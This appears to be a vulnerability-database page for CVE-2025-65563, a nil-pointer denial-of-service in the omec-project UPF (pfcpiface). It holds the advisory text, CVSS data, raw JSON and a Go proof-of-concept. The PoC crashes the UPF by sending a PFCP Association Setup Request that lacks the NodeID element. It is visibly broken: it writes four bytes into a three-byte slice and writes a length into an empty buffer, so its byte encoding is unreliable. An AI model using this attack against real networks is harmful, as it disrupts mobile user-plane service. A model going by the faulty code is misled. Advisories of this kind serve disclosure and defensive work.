Security Vulnerability Report
CVE-2025-65563 CVSS 7.5 HIGH

CVE-2025-65563

Published: 2025-12-18 19:16:34
Last Modified: 2026-01-07 21:03:19

Description

A denial-of-service vulnerability exists in the omec-project UPF (component upf-epc/pfcpiface) up to at least version upf-epc-pfcpiface:2.1.3-dev. When the UPF receives a PFCP Association Setup Request that is missing the mandatory NodeID Information Element, the association setup handler dereferences a nil pointer instead of validating the message, causing a panic and terminating the UPF process. An attacker who can send PFCP Association Setup Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF and disrupt user-plane services.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:opennetworking:upf:*:*:*:*:*:*:*:* - VULNERABLE
omec-project UPF upf-epc-pfcpiface <= 2.1.3-dev

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
go
// Reproduction listing for CVE-2025-65563 as published on this page. It is
// meant to send one UDP datagram shaped like a PFCP Association Setup Request
// that carries no NodeID IE.
//
// Defender notes: per the advisory text, the defect is in the UPF's
// association setup handler, which dereferences the NodeID without first
// checking that the mandatory IE is present. The remedy is on the receiving
// side: reject the request when NodeID is absent. Independently, limit which
// hosts can reach the N4/PFCP port to the expected control-plane peers.
//
// NOTE(review): the message bytes are assembled by hand and are not validated
// against the PFCP specification anywhere in this listing. Do not derive
// detection signatures or patch-verification conclusions from its output.
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
	"net"
	"time"
)

// PFCPHeader describes PFCP header fields.
// It is declared here but not referenced anywhere else in this listing.
type PFCPHeader struct {
	Version     uint8
	MessageType uint8
	Length      uint32
	Sequence    uint32
}

// PFCP IE types.
// IE_NodeID is declared but never used: the listing deliberately omits that IE.
const (
	IE_NodeID = 0x0001
)

// main opens a UDP socket to the configured address, writes one payload and
// then waits up to five seconds for any reply.
func main() {
	// Target UPF N4/PFCP endpoint. "<UPF_IP>" is a placeholder, so the
	// listing does nothing useful until an address is filled in.
	targetIP := "<UPF_IP>"
	targetPort := "8805"

	// Connect to PFCP endpoint
	addr, err := net.ResolveUDPAddr("udp", targetIP+":"+targetPort)
	if err != nil {
		fmt.Printf("[-] Failed to resolve address: %v\n", err)
		return
	}

	// DialUDP only associates a local socket with the remote address; no
	// packet is exchanged, so the "Connected" message below says nothing
	// about whether the endpoint is reachable.
	conn, err := net.DialUDP("udp", nil, addr)
	if err != nil {
		fmt.Printf("[-] Failed to connect: %v\n", err)
		return
	}
	defer conn.Close()

	fmt.Println("[+] Connected to UPF PFCP endpoint")

	// Build the PFCP Association Setup Request without NodeID IE
	payload := buildMaliciousPFCPMessage()

	fmt.Printf("[+] Sending malicious PFCP Association Setup Request (%d bytes)\n", len(payload))

	// Send the packet with a single write on the UDP socket
	_, err = conn.Write(payload)
	if err != nil {
		fmt.Printf("[-] Failed to send packet: %v\n", err)
		return
	}

	fmt.Println("[+] Packet sent successfully")
	fmt.Println("[+] The UPF should crash due to nil pointer dereference")

	// Wait and check if UPF responds.
	// The return value of SetReadDeadline is not checked.
	conn.SetReadDeadline(time.Now().Add(5 * time.Second))
	buffer := make([]byte, 4096)
	_, _, err = conn.ReadFromUDP(buffer)
	if err != nil {
		// Any read error, including the deadline expiring, lands here. The
		// code cannot tell a crash from a filtered, dropped or ignored
		// datagram, so this message is not evidence about the target's
		// state. Confirm from the UPF's own logs or restart counters.
		fmt.Println("[+] No response received - UPF likely crashed")
	}
}

// buildMaliciousPFCPMessage assembles header, sequence and IE bytes into one
// buffer, in that order, leaving out the NodeID IE.
//
// NOTE(review): hand-rolled byte layout, not checked against the PFCP header
// format here. Treat it as illustrative of the missing-IE condition only.
func buildMaliciousPFCPMessage() []byte {
	var buf bytes.Buffer

	// PFCP Header: Version=1, MessageType=5 (Association Setup Request)
	header := []byte{0x20, 0x05, 0x00, 0x00}

	// Sequence Number: 0x00000001
	sequence := []byte{0x00, 0x00, 0x00, 0x01}

	// Sender's F-SEID (optional, but helps make it look like valid request)
	fseid := buildFSEIDIE()

	// OMIT NodeID IE - this triggers the vulnerability.
	// This is the condition a patched handler must detect and reject.
	// Build IE list without NodeID
	ieData := fseid

	// Calculate message length (header + ie data)
	msgLength := uint32(4 + len(ieData)) // 4 bytes for header extension

	// Update header with actual length
	binary.BigEndian.PutUint32(header[1:], msgLength)

	buf.Write(header)
	buf.Write(sequence)
	buf.Write(ieData)

	return buf.Bytes()
}

// buildFSEIDIE builds the bytes that the caller uses as its only IE.
// The inline comments label them as an F-SEID IE (type 57).
//
// NOTE(review): the encoding is hand-rolled and unverified in this listing.
// Confirm against the specification before using it as a reference.
func buildFSEIDIE() []byte {
	var buf bytes.Buffer

	// IE Type: F-SEID (57)
	buf.Write([]byte{0x00, 0x39})

	// IE Length (placeholder)
	ieContent := []byte{
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, // F-SEID value
		0x00,                   // IPv4 indicator
		0x00, 0x00, 0x00, 0x01, // IPv4 address
	}

	ieLength := uint16(len(ieContent))
	binary.BigEndian.PutUint16(buf.Next(2), ieLength)
	buf.Write(ieContent)

	return buf.Bytes()
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65563", "sourceIdentifier": "[email protected]", "published": "2025-12-18T19:16:33.850", "lastModified": "2026-01-07T21:03:18.523", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial-of-service vulnerability exists in the omec-project UPF (component upf-epc/pfcpiface) up to at least version upf-epc-pfcpiface:2.1.3-dev. When the UPF receives a PFCP Association Setup Request that is missing the mandatory NodeID Information Element, the association setup handler dereferences a nil pointer instead of validating the message, causing a panic and terminating the UPF process. An attacker who can send PFCP Association Setup Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF and disrupt user-plane services."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opennetworking:upf:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.1.2", "matchCriteriaId": "C355FD9F-CA5B-4D62-BDA4-991D1443602B"}]}]}], "references": [{"url": "https://github.com/omec-project/upf/issues/955", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/omec-project/upf/pull/963", "source": "[email protected]", "tags": 
["Issue Tracking"]}, {"url": "https://github.com/omec-project/upf/issues/955", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}